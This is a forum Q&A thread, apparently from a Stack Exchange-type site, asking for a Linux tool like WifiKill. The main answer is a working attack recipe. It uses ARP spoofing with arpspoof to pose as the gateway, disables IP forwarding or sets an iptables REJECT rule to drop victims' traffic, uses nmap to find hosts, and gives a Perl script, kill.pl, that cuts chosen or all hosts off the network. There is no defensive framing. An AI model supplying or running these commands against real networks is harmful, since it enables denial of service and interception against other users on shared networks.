Is there any (preferably Linux) program similar to the WifiKill Android app?
42 Answers
Well, Android is Linux therefore you can replicate the actions of ponury's WifiKill on your Linux computer
WifiKill does two things:
- It masqurerades as the gateway, so the victims would send packets to the phone instead of sendng them to the gateway
- It turns off packet forwarding. Therefore, the victims will send all packets to your computer which will drop them
For masquerading you need ARP spoofing. You can use the arpspoof command from dsniff:
- First, you must know the IP of the gateway. Run
route -nin a terminal and get the gateway's IP from there. In the most common case (you are only connected to the wireless network), the gateway would be the entry with Destination0.0.0.0. You can useroute -n|grep ^0.0.0.0|cut -d' ' -f 10to get the IP of the default gateway - Then, use
arpspoofto masquerade as the gateway. Runarpspoof $IPas root if you want to kill the whole network except for you, or runarpspoof -t $VICTIM_IP $IPfor each victim if you want to kill only certain hosts
Now you are masquerading as the network's gateway. All packets sent by the victims are sent to your computer. You now have to turn off packet forwarding. To do this run echo -n 0 > /proc/sys/net/ipv?/ip_forward as root. This will drop all packets sent by the victims
It's been a long time since I last used WifiKill, but I remember it had a option to reject packets instead of dropping them [ rejecting gives people an instant connection error, dropping lets all their connections time out ]. To do this, you have to:
- Enable packet forwarding by running
echo -n 1 > /proc/sys/net/ipv?/ip_forwardas root - Set
netfilter's default FORWARD policy to REJECT. Runiptables -P FORWARD REJECT. Of course, you can useiptablesfor arbitrarily complex firewalling rules
WifiKill also lists the online hosts. To do this in Linux, you can use nmap to ping hosts in a given range. For example, if you want to find out what hosts are online in the range 192.168.1.1 to 192.168.1.254 you can run nmap -sP 192.168.1.1-254. While this will not list computers with 'stealth' firewalls, you can still kill these computers if you kill everybody on the network or if you know their exact IP
There might be a program out there doing what I listed above, but for the common case you can write a script:
#!/usr/bin/perl -w
#This is untested code. Compiling works, but I haven't tested anything more
my $gw=`route -n|grep ^0.0.0.0|cut -d' ' -f 10`;
if (@ARGV) { print "arpspoof -t $_ $gw &" for (@ARGV);
} else { print "arpspoof $gw &";
}
system "echo 0 > $_" for(</proc/sys/net/ipv?/ip_forward>);Save this as kill.pl then call it as ./kill.pl $IP1 $IP2 ... $IPn to kill $IP1, $IP2, ..., $IPn or as ./kill.pl to kill all hosts
Netcut for Windows does similar task.